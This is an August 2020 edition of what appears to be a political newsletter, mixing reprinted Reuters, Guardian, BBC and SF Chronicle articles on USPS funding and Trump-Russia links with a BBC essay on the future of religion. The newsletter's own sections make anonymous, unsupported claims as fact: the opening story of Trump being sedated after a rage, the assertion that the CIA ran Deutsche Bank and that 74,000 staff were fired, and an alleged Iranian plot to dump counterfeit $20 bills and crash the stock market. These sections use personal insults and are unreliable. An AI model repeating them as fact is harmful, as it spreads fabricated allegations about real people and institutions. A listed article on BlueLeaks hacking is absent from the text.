TBR News August 19, 2020

Aug 19 2020

The Voice of the White House

Comments for August 19, 2020; I was just talking with a connected person I know in DC and they told me the following hysterically entertaining story about Trump. This is a person who knows what is going on, not some slack-jawed blogger. Trump hates the USPS. Jeff Bezos, who owns the WAPO and Amazon, does not like Fat Donnie and his paper goes after him.

Trump will not tolerate criticism so he demanded the USPS jack up the postal rates on Amazon products. They refused so he made war on them.

Also, he does not want mail in ballots in the November election because if he loses, he wants to create an uproar and prolong his stay in office.

He put a mindless stooge in charge of the USPS and this chinless wonder started strangling the USPS but Trump boasted what he was doing and the public uproar was growing in volume and violence. A mob attacked the Trump stooge’s home and the House was going to rip him to bits so he backed off and left the USPS alone.

Following this defeat, Trump apparently locked himself in his bedroom and began to scream and break things. The Secret Service guards heard the smashing and screaming but could not get in because Fat Donnie had the locks changed. They smashed down the door and there was the Great One in his undies, face contorted with rage as he smashed lamps etc. A doctor was called and Trump got a calm-down shot.

He apparently had soiled himself in his rage. I would love pictures but one can imagine the One-Sent-By-God-to-Rule-Us looking like he had just sat on a pumpkin pie!

          Sic transit Gloria mundi!



The Table of Contents

  • Bipartisan majority of Americans want more money for Postal Service: Reuters/Ipsos Poll
  • Senate trumps Mueller with its Russian collusion report
  • Trump campaign Russia contacts were ‘grave threat’, says Senate report
  • Editorial: How Trump works for the Russians
  • Official Drug Money Laundering
  • An End Game in the Middle East
  • Tomorrow’s Gods: What is the future of religion?
  • Law enforcement websites hit by blueleaks may have been easy to hack




Bipartisan majority of Americans want more money for Postal Service: Reuters/Ipsos Poll

August 19, 2020

by Chris Kahn


NEW YORK (Reuters) – A bipartisan majority of Americans want the government to spend more money on the U.S. Postal Service, and most agree that mail delivery will be a vital part of the November election, a Reuters/Ipsos public opinion poll released on Wednesday found.

The Aug. 14-18 poll took place in the middle of an uproar over changes to mail service ordered by Postmaster General Louis DeJoy, a large donor to President Donald Trump.

After complaints that cuts could interfere with mail-in voting, which has gained in importance due to the coronavirus pandemic, DeJoy said on Tuesday he would pause any further changes.

The poll found that 78% of Americans, including 92% of Democrats and 67% of Republicans, agreed “a well-functioning United States Postal Service is important to having a smooth and successful election during the coronavirus pandemic.”

Nearly three-quarters of Americans, including 88% of Democrats and 60% of Republicans, agreed “funding for the United States Postal Service should be increased to ensure Americans’ mail gets delivered in a timely fashion.”

The Democratic-controlled House of Representatives has already approved $25 billion in new postal funding, which Trump has criticized as too much. White House Chief of Staff Mark Meadows said this week that the president may support additional funding for the agency as part of a broader spending package for coronavirus relief, however.


According to the poll, 56% of U.S. adults disapprove of the president’s overall performance in office, with 39% approving and 5% unsure.

Democratic presidential challenger Joe Biden leads Trump in support among registered voters by 8 percentage points.

The top three things that registered voters said they wanted from their president were an ability to lead the U.S. recovery from the coronavirus pandemic, an ability to “restore trust” in government, and strong ideas about improving the economy.

Biden has a clear advantage with the first two, according to the poll: 46% of registered voters think Biden would be better at steering America’s pandemic response, while 36% said Trump would be better. And 45% said Biden would be better at restoring trust in government, while 34% said it was Trump.

When it comes to shaping the U.S. economy, 46% said Trump would be better, compared with 40% who said Biden would be better.

The poll overlapped with the first days of the Aug. 17-20 Democratic National Convention in Milwaukee, as the 2020 U.S. presidential campaign shifted into a higher gear.

Former first lady Michelle Obama capped the convention’s first day on Monday night by saying Trump was “clearly in over his head.”

The Reuters/Ipsos poll was conducted online, in English, throughout the United States. It gathered responses from 1,391 U.S. adults, including 617 who identified as Democrats and 523 who identified as Republicans. The poll has a credibility interval, a measure of precision, of about five percentage points.

Editing by Scott Malone and Sonya Hepinstall


Senate trumps Mueller with its Russian collusion report

1,000-page document lays bare a stunning web of contacts between the 2016 Trump campaign and Russia.

August 19, 2020

by Tim Walker

The Guardian

More than a year after the messy conclusion of the Mueller investigation, the US senate intelligence committee has released its 1,000-page bipartisan report into the stunning array of links between the Trump campaign and Russia during the 2016 election.

Among the explosive details is the bald assertion that a Russian national who worked with the president’s campaign was in fact a career spy. The senate panel identifies Konstantin Kilimnik, a longtime associate of the then-Trump campaign manager, Paul Manafort, as an officer of the GRU, and cites evidence – some of it redacted – linking him to the hacking of Democratic party emails.


Trump campaign Russia contacts were ‘grave threat’, says Senate report

August 19, 2020

BBC News

A Republican-led Senate panel has concluded that Trump campaign contacts with Russia in 2016 “represented a grave counterintelligence threat”.

The nearly 1,000-page intelligence committee report laid out links between President Donald Trump’s associates and Kremlin officials.

It is the fifth and probably final report into Russian meddling during the 2016 presidential election.

When asked about the report on Tuesday, Mr Trump said he “didn’t read it”.

According to the committee, the expansive report is “the most comprehensive description to date of Russia’s activities and the threat they posed”.

It details the interactions between Trump campaign staff and Russian operatives, including a Kremlin intelligence officer.

The findings also confirm aspects of the special counsel Robert Mueller’s report from his criminal probe into the Trump campaign and Russian election interference.

What’s in the report?

The bipartisan senate committee investigation was not a criminal inquiry, but was meant to offer recommendations to prevent future interference.

The report concluded that the Kremlin “engaged in an aggressive, multifaceted effort to influence, or attempt to influence” the 2016 election, and that some Trump associates were keen on help from Russia.

It said the Trump campaign, with many affiliates who had no government experience, were easy targets for foreign influence.

The committee also highlighted the role of former Trump campaign manager Paul Manafort, who was convicted of conspiracy and fraud charges during the Mueller inquiry.

Manafort: Trump’s former campaign chair

Manafort’s contact with Russian oligarchs and intelligence affiliates – namely Konstantin Kilimnik – and his access to Mr Trump “created opportunities for Russian intelligence services to exert influence over, and acquire confidential information on, the Trump Campaign,” the committee alleges.

The committee also reported that Russian President Vladimir Putin was behind the WikiLeaks effort to hack Democratic Party officials and leak information to damage Hillary Clinton’s campaign.

The report confirmed the Kremlin used Manafort and WikiLeaks to help Mr Trump win the 2016 election, and that WikiLeaks was aware it was assisting Russian intelligence.

It also found that the Trump campaign tried to obtain information about the leak from Roger Stone – a longtime Trump ally and adviser. The committee was not able to determine how much access Stone had to WikiLeaks, however.

Mr Trump has said he does not recall speaking about WikiLeaks with Stone, but Tuesday’s report found that “despite Trump’s recollection”, he did speak to Stone and other campaign staff about the matter “on multiple occasions”.

Stone was convicted of lying to Congress, obstruction and witness tampering, but pardoned by Mr Trump in July.

What did Trump say?

The president has long derided claims that his election victory was influenced by Russia, at times questioning findings from his own agencies.

In response to a question about the report, Mr Trump told reporters: “I don’t know anything about it. I didn’t read it.”

He added: “It’s all a hoax.”

White House spokesman Judd Deere, however, said the report was further confirmation “that there was absolutely no collusion between the Trump campaign and Russia”.


Editorial: How Trump works for the Russians

January 18, 2019

San Francisco Chronicle Editorial Board

Like much about his administration, the possibility that President Trump is a Russian asset has the disorienting quality of being simultaneously unthinkable and plausible. The recent report that the FBI opened an investigation into whether Trump was working for Moscow defies assumptions outside “The Manchurian Candidate” and other fictions. And yet evidence of his furthering Vladimir Putin’s goals is plentiful and plain.

The FBI opened the counterintelligence probe in 2017, the New York Times reported, soon after Trump fired its director, James Comey, and explicitly linked his decision to the bureau’s investigation of Russian interference in the 2016 campaign. The inquiry’s central concern was whether the president, either as secret agent or useful idiot, was advancing Russia’s interests in contravention of the United States’. Days after the investigation began, newly appointed Special Counsel Robert Mueller took it over, according to the Times, along with the continuing criminal investigation of the Trump team’s relationship with Russia.

Trump’s initial failure to deny the report — in the friendly confines of a Fox News interview, no less — wasn’t reassuring. Neither was the Washington Post’s subsequent revelation that Trump took pains to conceal the content of his discussions with Putin, even confiscating an interpreter’s notes. (The president eventually got around to insisting he “never worked for Russia,” a dramatic narrowing of his earlier, false claim to have “nothing to do with Russia.”)

The worst possible implication of these reports, that Putin has an operative in the White House, is dark and outlandish indeed. But Trump pursues the Russian strongman’s priorities openly and overtly, even when they conflict with U.S. interests.

His assault on NATO is a glaring example. An American project to counter the Soviet Union, NATO is a heretofore bipartisan pillar of U.S. foreign policy as well as a wartime ally, 9/11 being the only instance in which the compact’s mutual protection guarantee has been invoked. For Putin, on the other hand, NATO is a bete noire. He has gone to great lengths to thwart its minutest expansions, most recently fomenting discontent over Macedonia’s accession by meddling in Greek elections. (Sound familiar?)

Trump’s performance at a NATO summit last year, where he insulted, berated and threatened to forsake key European allies, left little doubt that he shares Putin’s attitude toward the trans-Atlantic alliance. Though Trump ended the gathering on an incongruously conciliatory note, the Times recently reported that he repeatedly returns to the idea of withdrawing from NATO despite his advisers’ best efforts.

U.S. retreat from Syria is another Kremlin priority to which Trump hews in spite of his subordinates. His abrupt announcement last month that 2,000 American troops would leave the conflict brought about the resignation of Defense Secretary Jim Mattis, a NATO alumnus.

Granted, withdrawal from military conflicts and even alliances might be favored for reasons that have nothing to do with Russia. But the administration’s favors to Moscow extend to the otherwise inexplicable. Take last month’s lifting of sanctions against companies linked to the Russian oligarch Oleg Deripaska, a close Putin ally. Reversing the sanctions, which were a response to Russia’s attack on the U.S. election, was so controversial that nearly 150 Republican lawmakers voted with Democrats to reinstate them.

Deripaska, by the way, was also close to Trump’s disgraced campaign chairman, Paul Manafort, whose lawyers recently acknowledged that he shared internal polling data with a suspected Russian intelligence associate. Not coincidentally, last week Trump lawyer Rudy Giuliani abandoned his long-standing insistence that there was “no collusion” between the campaign and Russia.

Even Trump’s handling of domestic affairs reflects Russia’s designs against Western efficacy. Consider the unprecedented government shutdown that is crippling agencies responsible for national security.

Whether the president has worked for the Russians in the counterintelligence sense isn’t known. But he has clearly worked out for them very well.


Official Drug Money Laundering


It is no secret in various official circles here in Washington, that the failed Deutsche Bank was firmly in the hands of the CIA and was used by them to finance various projects, to include assisting their Russian drug running friends to launder money. Like Trump, Deutsche Bank has been scrutinized for its dealings in Russia. The bank paid more than $600 million to regulators in 2017 and agreed to a consent order that cited “serious compliance deficiencies” that “spanned Deutsche Bank’s global empire.” The case focused on “mirror trades,” which Deutsche Bank facilitated between 2011 and 2015. The trades were sham transactions whose sole purpose appeared to be to illicitly convert rubles into pounds and dollars — some $10 billion worth.

The bank was “laundering money for wealthy Russians and people connected to Putin and the Kremlin in a variety of ways for almost the exact time period that they were doing business with Donald Trump,” “And all of that money through Deutsche Bank was being channeled through the same exact legal entity in the U.S. that was handling the Donald Trump relationship in the U.S. And so there are a lot of coincidences here.”

It wasn’t just Donald Trump who maintained a warm relationship with Deutsche. The German bank looked after his entire family. Jared Kushner, Ivanka, and Kushner’s mother Seryl Stadtmauer were all Deutsche clients.

The large German financial conglomerate Deutsche Bank, later to become one of Donald Trump’s favored institutions, became entangled with Russia after the bank bought boutique investment bank UFG in order to gain entry into Moscow’s financial markets. UFG’s chairman, Charles Ryan, was an American banker; his partner was Boris Fyodorov, formerly Russia’s Finance Minister in the Yeltsin administration. Deutsche’s future co-CEO, Anshu Jain, was the one who wanted Deutsche to become more involved with Russia. Other investment banks soon found Deutsche’s business practices suspicious. Christopher Barter, at the time the CEO of Goldman Sachs Moscow, said later: “They were doing some very curious things. Nobody could make sense of their business. We found the nature and concentration of their business with VTB (Vneshtorgbank) quite galling. Nobody else could touch VTB.”

VTB was known to be deeply connected to Russian intelligence, the FSB.

Trump is also well-known to have been up to his wattled neck in this project, a project to which elements of the German government not infiltrated by the CIA were informed and have reacted by firing known CIA-paid bank employees and firing carload lots of them, 74,000 in total. Eventually this will come out, hopefully before the next election.


An End Game in the Middle East

Trump loves to use sanctions to threaten or punish perceived disobedient individuals or countries. These do have an effect but in the long run, they create so much animosity against the United States that they are proving to be a weapon with double edges.

There is more to economic warfare than sanctions and Trump does not realize that while a country like Iran cannot sanction the United States, they do have the ability to wreak economic havoc in retaliation to Trump’s damaging sanctions.

Emulating the German ‘Operation Bernhard’ and that business in ’69 in Vancouver, Canada, the Iranians are about to dump in American cities, very good fake $20 counterfeit bills.

Not pass but dump.

They have used twenty-two sets of serial numbers on their fake money. Target cities are: New York, Chicago, Los Angeles, Dallas, Denver, Boston, Miami and St. Louis.

This would for a certainty result in chaos as retail business, and even banks, would refuse to accept any $20 bill.

This is Iran’s payback for the sanctions.

Also, the Iranians have a method to interfere with the NYSE board.

If they dropped, say, ten leading stocks on the board, the bots would take over and we would have a reprise of ’29.

No shooting, understand, but devastation.

And if a recently prepared false flag were put in motion, Hezbollah, a Shiite Iranian ally, would blanket Israel with a flood of surface-to-surface missiles (mostly Russian and at least one type that is in a silo.) A significant number of these missiles are GPS directed and can pinpoint any target with considerable accuracy.

Israel’s vaunted ‘Iron Dome’ missile protection would only be able to interdict a very small portion of this apocalyptic flood.

That is why Fat Bibi the Crossdresser is, and has been, begging Fat Donald the Drug Money Launderer to carpet-bomb all of southern Lebanon.

If Fat Donald agrees, someone in the Pentagon will alert their Russian opposite numbers and the games will start at once.


Tomorrow’s Gods: What is the future of religion?

Throughout history, people’s faith and their attachments to religious institutions have transformed, argues Sumit Paul-Choudhury. So what’s next?

August 2 2019

by Sumit Paul-Choudhury

BBC News

Before Mohammed, before Jesus, before Buddha, there was Zoroaster. Some 3,500 years ago, in Bronze Age Iran, he had a vision of the one supreme God. A thousand years later, Zoroastrianism, the world’s first great monotheistic religion, was the official faith of the mighty Persian Empire, its fire temples attended by millions of adherents. A thousand years after that, the empire collapsed, and the followers of Zoroaster were persecuted and converted to the new faith of their conquerors, Islam.

Another 1,500 years later – today – Zoroastrianism is a dying faith, its sacred flames tended by ever fewer worshippers.

We take it for granted that religions are born, grow and die – but we are also oddly blind to that reality. When someone tries to start a new religion, it is often dismissed as a cult. When we recognise a faith, we treat its teachings and traditions as timeless and sacrosanct. And when a religion dies, it becomes a myth, and its claim to sacred truth expires. Tales of the Egyptian, Greek and Norse pantheons are now considered legends, not holy writ.

Even today’s dominant religions have continually evolved throughout history. Early Christianity, for example, was a truly broad church: ancient documents include yarns about Jesus’ family life and testaments to the nobility of Judas. It took three centuries for the Christian church to consolidate around a canon of scriptures – and then in 1054 it split into the Eastern Orthodox and Catholic churches. Since then, Christianity has continued both to grow and to splinter into ever more disparate groups, from silent Quakers to snake-handling Pentecostalists.

If you believe your faith has arrived at ultimate truth, you might reject the idea that it will change at all. But if history is any guide, no matter how deeply held our beliefs may be today, they are likely in time to be transformed or transferred as they pass to our descendants – or simply to fade away.

If religions have changed so dramatically in the past, how might they change in the future? Is there any substance to the claim that belief in gods and deities will die out altogether? And as our civilisation and its technologies become increasingly complex, could entirely new forms of worship emerge?

To answer these questions, a good starting point is to ask: why do we have religion in the first place?

Reason to believe

One notorious answer comes from Voltaire, the 18th Century French polymath, who wrote: “If God did not exist, it would be necessary to invent him.” Because Voltaire was a trenchant critic of organised religion, this quip is often quoted cynically. But in fact, he was being perfectly sincere. He was arguing that belief in God is necessary for society to function, even if he didn’t approve of the monopoly the church held over that belief.

Many modern students of religion agree. The broad idea that a shared faith serves the needs of a society is known as the functionalist view of religion. There are many functionalist hypotheses, from the idea that religion is the “opium of the masses”, used by the powerful to control the poor, to the proposal that faith supports the abstract intellectualism required for science and law. One recurring theme is social cohesion: religion brings together a community, who might then form a hunting party, raise a temple or support a political party.

Those faiths that endure are “the long-term products of extraordinarily complex cultural pressures, selection processes, and evolution”, writes Connor Wood of the Center for Mind and Culture in Boston, Massachusetts on the religious reference website Patheos, where he blogs about the scientific study of religion. New religious movements are born all the time, but most don’t survive long. They must compete with other faiths for followers and survive potentially hostile social and political environments.

Under this argument, any religion that does endure has to offer its adherents tangible benefits. Christianity, for example, was just one of many religious movements that came and mostly went during the course of the Roman Empire. According to Wood, it was set apart by its ethos of caring for the sick – meaning more Christians survived outbreaks of disease than pagan Romans. Islam, too, initially attracted followers by emphasising honour, humility and charity – qualities which were not endemic in turbulent 7th-Century Arabia.

Given this, we might expect the form that religion takes to follow the function it plays in a particular society – or as Voltaire might have put it, that different societies will invent the particular gods they need. Conversely, we might expect similar societies to have similar religions, even if they have developed in isolation. And there is some evidence for that – although when it comes to religion, there are always exceptions to any rule.

Hunter-gatherers, for example, tend to believe that all objects – whether animal, vegetable or mineral – have supernatural aspects (animism) and that the world is imbued with supernatural forces (animatism). These must be understood and respected; human morality generally doesn’t figure significantly. This worldview makes sense for groups too small to need abstract codes of conduct, but who must know their environment intimately. (An exception: Shinto, an ancient animist religion, is still widely practised in hyper-modern Japan.)

At the other end of the spectrum, the teeming societies of the West are at least nominally faithful to religions in which a single watchful, all-powerful god lays down, and sometimes enforces, moral instructions: Yahweh, Christ and Allah. The psychologist Ara Norenzayan argues it was belief in these “Big Gods” that allowed the formation of societies made up of large numbers of strangers. Whether that belief constitutes cause or effect has recently been disputed, but the upshot is that sharing a faith allows people to co-exist (relatively) peacefully. The knowledge that Big God is watching makes sure we behave ourselves.

Or at least, it did. Today, many of our societies are huge and multicultural: adherents of many faiths co-exist with each other – and with a growing number of people who say they have no religion at all. We obey laws made and enforced by governments, not by God. Secularism is on the rise, with science providing tools to understand and shape the world.

Given all that, there’s a growing consensus that the future of religion is that it has no future.

Imagine there’s no heaven

Powerful intellectual and political currents have driven this proposition since the early 20th Century. Sociologists argued that the march of science was leading to the “disenchantment” of society: supernatural answers to the big questions were no longer felt to be needed. Communist states like Soviet Russia and China adopted atheism as state policy and frowned on even private religious expression. In 1968, the eminent sociologist Peter Berger told the New York Times that by “the 21st Century, religious believers are likely to be found only in small sects, huddled together to resist a worldwide secular culture”.

Now that we’re actually in the 21st Century, Berger’s view remains an article of faith for many secularists – although Berger himself recanted in the 1990s. His successors are emboldened by surveys showing that in many countries, increasing numbers of people are saying they have no religion. That’s most true in rich, stable countries like Sweden and Japan, but also, perhaps more surprisingly, in places like Latin America and the Arab world. Even in the US, long a conspicuous exception to the axiom that richer countries are more secular, the number of “nones” has been rising sharply. In the 2018 General Social Survey of US attitudes, “no religion” became the single largest group, edging out evangelical Christians.

Despite this, religion is not disappearing on a global scale – at least in terms of numbers. In 2015, the Pew Research Center modelled the future of the world’s great religions based on demographics, migration and conversion. Far from a precipitous decline in religiosity, it predicted a modest increase in believers, from 84% of the world’s population today to 87% in 2050. Muslims would grow in number to match Christians, while the number unaffiliated with any religion would decline slightly.

The pattern Pew predicted was of “the secularising West and the rapidly growing rest”. Religion will continue to grow in economically and socially insecure places like much of sub-Saharan Africa – and to decline where they are stable. That chimes with what we know about the deep-seated psychological and neurological drivers of belief. When life is tough or disaster strikes, religion seems to provide a bulwark of psychological (and sometimes practical) support. In a landmark study, people directly affected by the 2011 earthquake in Christchurch, New Zealand became significantly more religious than other New Zealanders, who became marginally less religious.

We also need to be careful when interpreting what people mean by “no religion”. “Nones” may be disinterested in organised religion, but that doesn’t mean they are militantly atheist. In 1994, the sociologist Grace Davie classified people according to whether they belonged to a religious group and/or believed in a religious position. The traditionally religious both belonged and believed; hardcore atheists did neither. Then there are those who belong but don’t believe – parents attending church to get a place for their child at a faith school, perhaps. And, finally, there are those who believe in something, but don’t belong to any group.

The research suggests that the last two groups are significant. The Understanding Unbelief project at the University of Kent in the UK is conducting a three-year, six-nation survey of attitudes among those who say they don’t believe God exists (“atheists”) and those who don’t think it’s possible to know if God exists (“agnostics”). In interim results released in May 2019, the researchers found that few unbelievers actually identify themselves by these labels, with significant minorities opting for a religious identity.

What’s more, around three-quarters of atheists and nine out of 10 agnostics are open to the existence of supernatural phenomena, including everything from astrology to supernatural beings and life after death. Unbelievers “exhibit significant diversity both within, and between, different countries. Accordingly, there are very many ways of being an unbeliever”, the report concluded – including, notably, the dating-website cliche “spiritual, but not religious”. Like many cliches, it’s rooted in truth. But what does it actually mean?

The old gods return

In 2005, Linda Woodhead wrote The Spiritual Revolution, in which she described an intensive study of belief in the British town of Kendal. Woodhead and her co-author found that people were rapidly turning away from organised religion, with its emphasis on fitting into an established order of things, towards practices designed to accentuate and foster individuals’ own sense of who they are. If the town’s Christian churches did not embrace this shift, they concluded, congregations would dwindle into irrelevance while self-guided practices would become the mainstream in a “spiritual revolution”.

Today, Woodhead says that revolution has taken place – and not just in Kendal. Organised religion is waning in the UK, with no real end in sight. “Religions do well, and always have done, when they are subjectively convincing – when you have the sense that God is working for you,” says Woodhead, now professor of sociology of religion at the University of Lancaster in the UK.

In poorer societies, you might pray for good fortune or a stable job. The “prosperity gospel” is central to several of America’s megachurches, whose congregations are often dominated by economically insecure congregations. But if your basic needs are well catered for, you are more likely to be seeking fulfilment and meaning. Traditional religion is failing to deliver on this, particularly where doctrine clashes with moral convictions that arise from secular society – on gender equality, say.

In response, people have started constructing faiths of their own.

What do these self-directed religions look like? One approach is syncretism, the “pick and mix” approach of combining traditions and practices that often results from the mixing of cultures. Many religions have syncretistic elements, although over time they are assimilated and become unremarkable. Festivals like Christmas and Easter, for example, have archaic pagan elements, while daily practice for many people in China involves a mixture of Mahayana Buddhism, Taoism and Confucianism. The joins are easier to see in relatively young religions, such as Vodoun or Rastafarianism.

An alternative is to streamline. New religious movements often seek to preserve the central tenets of an older religion while stripping it of trappings that may have become stifling or old-fashioned. In the West, one form this takes is for humanists to rework religious motifs: there have been attempts to rewrite the Bible without any supernatural elements, calls for the construction of “atheist temples” dedicated to contemplation. And the “Sunday Assembly” aims to recreate the atmosphere of a lively church service without reference to God. But without the deep roots of traditional religions, these can struggle: the Sunday Assembly, after initial rapid expansion, is now reportedly struggling to keep up its momentum.

But Woodhead thinks the religions that might emerge from the current turmoil will have much deeper roots. The first generation of spiritual revolutionaries, coming of age in the 1960s and 1970s, were optimistic and universalist in outlook, happy to take inspiration from faiths around the world. Their grandchildren, however, are growing up in a world of geopolitical stresses and socioeconomic angst; they are more likely to hark back to supposedly simpler times. “There is a pull away from global universality to local identities,” says Woodhead. “It’s really important that they’re your gods, they weren’t just made up.”

In the European context, this sets the stage for a resurgence of interest in paganism. Reinventing half-forgotten “native” traditions allows the expression of modern concerns while retaining the patina of age. Paganism also often features divinities that are more like diffuse forces than anthropomorphic gods; that allows people to focus on issues they feel sympathetic towards without having to make a leap of faith to supernatural deities.

In Iceland, for example, the small but fast-growing Ásatrú faith has no particular doctrine beyond somewhat arch celebrations of Old Norse customs and mythology, but has been active on social and ecological issues. Similar movements exist across Europe, such as Druidry in the UK. Not all are liberally inclined. Some are motivated by a desire to return to what they see as conservative “traditional” values – leading in some cases to clashes over the validity of opposing beliefs.

These are niche activities at the moment, and might sometimes be more about playing with symbolism than heartfelt spiritual practice. But over time, they can evolve into more heartfelt and coherent belief systems: Woodhead points to the robust adoption of Rodnovery – an often conservative and patriarchal pagan faith based around the reconstructed beliefs and traditions of the ancient Slavs – in the former Soviet Union as a potential exemplar of things to come.

So the nones mostly represent not atheists, nor even secularists, but a mixture of “apatheists” – people who simply don’t care about religion – and practitioners of what you might call “disorganised religion”. While the world religions are likely to persist and evolve for the foreseeable future, we might for the rest of this century see an efflorescence of relatively small religions jostling to break out among these groups. But if Big Gods and shared faiths are key to social cohesion, what happens without them?

One nation under Mammon

One answer, of course, is that we simply get on with our lives. Munificent economies, good government, solid education and effective rule of law can ensure that we rub along happily without any kind of religious framework. And indeed, some of the societies with the highest proportions of non-believers are among the most secure and harmonious on Earth.

What remains debatable, however, is whether they can afford to be irreligious because they have strong secular institutions – or whether being secular has helped them achieve social stability. Religionists say even secular institutions have religious roots: civil legal systems, for example, codify ideas about justice based on social norms established by religions. The likes of the New Atheists, on the other hand, argue that religion amounts to little more than superstition, and abandoning it will enable societies to improve their lot more effectively.

Connor Wood is not so sure. He contends that a strong, stable society like Sweden’s is both extremely complex and very expensive to run in terms of labour, money and energy – and that might not be sustainable even in the short term. “I think it’s pretty clear that we’re entering into a period of non-linear change in social systems,” he says. “The Western consensus on a combination of market capitalism and democracy can’t be taken for granted.”

That’s a problem, since that combination has radically transformed the social environment from the one in which the world religions evolved – and has to some extent supplanted them.

“I’d be careful about calling capitalism a religion, but a lot of its institutions have religious elements, as in all spheres of human institutional life,” says Wood. “The ‘invisible hand’ of the market almost seems like a supernatural entity.”

Financial exchanges, where people meet to conduct highly ritualised trading activity, seem quite like temples to Mammon, too. In fact, religions, even the defunct ones, can provide uncannily appropriate metaphors for many of the more intractable features of modern life.

The pseudo-religious social order might work well when times are good. But when the social contract becomes stressed – through identity politics, culture wars or economic instability – Wood suggests the consequence is what we see today: the rise of authoritarians in country after country. He cites research showing that people ignore authoritarian pitches until they sense a deterioration of social norms.

“This is the human animal looking around and saying we don’t agree how we should behave,” Wood says. “And we need authority to tell us.” It’s suggestive that political strongmen are often hand in glove with religious fundamentalists: Hindu nationalists in India, say, or Christian evangelicals in the US. That’s a potent combination for believers and an unsettling one for secularists: can anything bridge the gap between them?

Mind the gap

Perhaps one of the major religions might change its form enough to win back non-believers in significant numbers. There is precedent for this: in the 1700s, Christianity was ailing in the US, having become dull and formal even as the Age of Reason saw secular rationalism in the ascendant. A new guard of travelling fire-and-brimstone preachers successfully reinvigorated the faith, setting the tone for centuries to come – an event called the “Great Awakenings”.

The parallels with today are easy to draw, but Woodhead is sceptical that Christianity or other world religions can make up the ground they have lost, in the long term. Once the founders of libraries and universities, they are no longer the key sponsors of intellectual thought. Social change undermines religions which don’t accommodate it: earlier this year, Pope Francis warned that if the Catholic Church didn’t acknowledge its history of male domination and sexual abuse it risked becoming “a museum”. And their tendency to claim we sit at the pinnacle of creation is undermined by a growing sense that humans are not so very significant in the grand scheme of things.

Perhaps a new religion will emerge to fill the void? Again, Woodhead is sceptical. “Historically, what makes religions rise or fall is political support,” she says, “and all religions are transient unless they get imperial support.” Zoroastrianism benefited from its adoption by the successive Persian dynasties; the turning point for Christianity came when it was adopted by the Roman Empire. In the secular West, such support is unlikely to be forthcoming, with the possible exception of the US. In Russia, by contrast, the nationalistic overtones of both Rodnovery and the Orthodox church win them tacit political backing.

But today, there’s another possible source of support: the internet.

Online movements gain followers at rates unimaginable in the past. The Silicon Valley mantra of “move fast and break things” has become a self-evident truth for many technologists and plutocrats. #MeToo started out as a hashtag expressing anger and solidarity but now stands for real changes to long-standing social norms. And Extinction Rebellion has striven, with considerable success, to trigger a radical shift in attitudes to the crises in climate change and biodiversity.

None of these are religions, of course, but they do share parallels with nascent belief systems – particularly that key functionalist objective of fostering a sense of community and shared purpose. Some have confessional and sacrificial elements, too. So, given time and motivation, could something more explicitly religious grow out of an online community? What new forms of religion might these online “congregations” come up with?

We already have some idea.

Deus ex machina

A few years ago, members of the self-declared “Rationalist” community website LessWrong began discussing a thought experiment about an omnipotent, super-intelligent machine – with many of the qualities of a deity and something of the Old Testament God’s vengeful nature.

It was called Roko’s Basilisk. The full proposition is a complicated logic puzzle, but crudely put, it goes that when a benevolent super-intelligence emerges, it will want to do as much good as possible – and the earlier it comes into existence, the more good it will be able to do. So to encourage everyone to do everything possible to help to bring it into existence, it will perpetually and retroactively torture those who don’t – including anyone who so much as learns of its potential existence. (If this is the first you’ve heard of it: sorry!)

Outlandish though it might seem, Roko’s Basilisk caused quite a stir when it was first suggested on LessWrong – enough for discussion of it to be banned by the site’s creator. Predictably, that only made the idea explode across the internet – or at least the geekier parts of it – with references to the Basilisk popping up everywhere from news sites to Doctor Who, despite protestations from some Rationalists that no-one really took it seriously. Their case was not helped by the fact that many Rationalists are strongly committed to other startling ideas about artificial intelligence, ranging from AIs that destroy the world by accident to human-machine hybrids that would transcend all mortal limitations.

Such esoteric beliefs have arisen throughout history, but the ease with which we can now build a community around them is new. “We’ve always had new forms of religiosity, but we haven’t always had enabling spaces for them,” says Beth Singler, who studies the social, philosophical and religious implications of AI at the University of Cambridge. “Going out into a medieval town square and shouting out your unorthodox beliefs was going to get you labelled a heretic, not win converts to your cause.”

The mechanism may be new, but the message isn’t. The Basilisk argument is in much the same spirit as Pascal’s Wager. The 17th-Century French mathematician suggested non-believers should nonetheless go through the motions of religious observance, just in case a vengeful God does turn out to exist. The idea of punishment as an imperative to cooperate is reminiscent of Norenzayan’s “Big Gods”. And arguments over ways to evade the Basilisk’s gaze are every bit as convoluted as the medieval Scholastics’ attempts to square human freedom with divine oversight.

Even the technological trappings aren’t new. In 1954, Fredric Brown wrote a (very) short story called “Answer”, in which a galaxy-spanning supercomputer is turned on and asked: is there a God? Now there is, comes the reply.

And some people, like AI entrepreneur Anthony Levandowski, think their holy objective is to build a super-machine that will one day answer just as Brown’s fictional machine did. Levandowski, who made a fortune through self-driving cars, hit the headlines in 2017 when it became public knowledge that he had founded a church, Way of the Future, dedicated to bringing about a peaceful transition to a world mostly run by super-intelligent machines. While his vision sounds more benevolent than Roko’s Basilisk, the church’s creed still includes the ominous lines: “We believe it may be important for machines to see who is friendly to their cause and who is not. We plan on doing so by keeping track of who has done what (and for how long) to help the peaceful and respectful transition.”

“There are many ways people think of God, and thousands of flavours of Christianity, Judaism, Islam,” Levandowski told Wired. “But they’re always looking at something that’s not measurable or you can’t really see or control. This time it’s different. This time you will be able to talk to God, literally, and know that it’s listening.”

Reality bites

Levandowski is not alone. In his bestselling book Homo Deus, Yuval Noah Harari argues that the foundations of modern civilisation are eroding in the face of an emergent religion he calls “dataism”, which holds that by giving ourselves over to information flows, we can transcend our earthly concerns and ties. Other fledgling transhumanist religious movements focus on immortality – a new spin on the promise of eternal life. Still others ally themselves with older faiths, notably Mormonism.

Are these movements for real? Some groups are performing or “hacking” religion to win support for transhumanist ideas, says Singler. “Unreligions” seek to dispense with the supposedly unpopular strictures or irrational doctrines of conventional religion, and so might appeal to the irreligious. The Turing Church, founded in 2011, has a range of cosmic tenets – “We will go to the stars and find Gods, build Gods, become Gods, and resurrect the dead” – but no hierarchy, rituals or proscribed activities and only one ethical maxim: “Try to act with love and compassion toward other sentient beings.”

But as missionary religions know, what begins as a mere flirtation or idle curiosity – perhaps piqued by a resonant statement or appealing ceremony – can end in a sincere search for truth.

The 2001 UK census found that Jediism, the fictional faith observed by the good guys in Star Wars, was the fourth largest religion: nearly 400,000 people had been inspired to claim it, initially by a tongue-in-cheek online campaign. Ten years later, it had dropped to seventh place, leading many to dismiss it as a prank. But as Singler notes, that is still an awful lot of people – and a lot longer than most viral campaigns endure.

